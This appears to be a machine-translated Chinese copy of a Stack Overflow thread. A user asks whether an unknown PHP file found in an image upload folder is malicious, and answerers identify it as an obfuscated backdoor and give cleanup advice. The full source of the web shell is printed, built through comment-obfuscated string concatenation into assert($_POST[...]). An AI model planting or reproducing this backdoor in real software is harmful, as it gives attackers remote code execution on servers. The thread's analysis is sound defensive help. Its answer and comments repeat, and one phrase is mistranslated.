我上传文件夹中的未知PHP文件,isn';恶意代码?

我上传文件夹中的未知PHP文件,isn';恶意代码?,php,Php,最近我发现我的项目被黑客攻击了,我在我的images文件夹中发现了一个脚本,其中有一个目录供用户上传他们的图像(使用文件输入)。这是我在目录中找到的脚本 errot_db.php <?php @$_="s"."s"./*-/*-*/"e"./*-/*-*/"r"; @$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t"; @$_/*-/*-*/($/*-/*-*

最近我发现我的项目被黑客攻击了,我在我的images文件夹中发现了一个脚本,其中有一个目录供用户上传他们的图像(使用文件输入)。这是我在目录中找到的脚本

errot_db.php

<?php                  
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";                  
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";                  
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}                  
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);
?>

此代码隐藏以下语句:

@assert ($_POST[025]);

这意味着它将执行POST变量“025”中发送的PHP代码。所以,是的,这确实是一个后门!我建议您继续寻求有关如何正确处理放射性尘埃的帮助。

此代码隐藏了以下语句:

@assert ($_POST[025]);

这意味着它将执行POST变量“025”中发送的PHP代码。所以,是的,这确实是一个后门!我建议继续寻求有关如何正确处理影响的帮助。

此问题属于security.stackexchange.com。如果它不是您的代码的产物,则不属于security.stackexchange.com。擦除整个输出并重新部署一个已知的工作副本。@geoot他们真的会取消我的wordpress类问题吗?你确定吗?这是恶意的。它试图执行攻击者以POST变量形式传递给该文件的代码。您不知道的任何文件都是不安全的文件。您应该擦除该服务器并恢复一个您知道是干净的备份(该文件创建之前的备份),更改所有密码,并将潜在泄漏通知用户。另外:验证您的输入!用户输入永远不可信任此问题属于security.stackexchange.com。如果它不是您的代码的工件,则它不属于security.stackexchange.com。擦除整个输出并重新部署一个已知的工作副本。@geoot他们真的会取消我的wordpress类问题吗?你确定吗?这是恶意的。它试图执行攻击者以POST变量形式传递给该文件的代码。您不知道的任何文件都是不安全的文件。您应该擦除该服务器并恢复一个您知道是干净的备份(该文件创建之前的备份),更改所有密码,并将潜在泄漏通知用户。另外:验证您的输入!用户输入永远不可信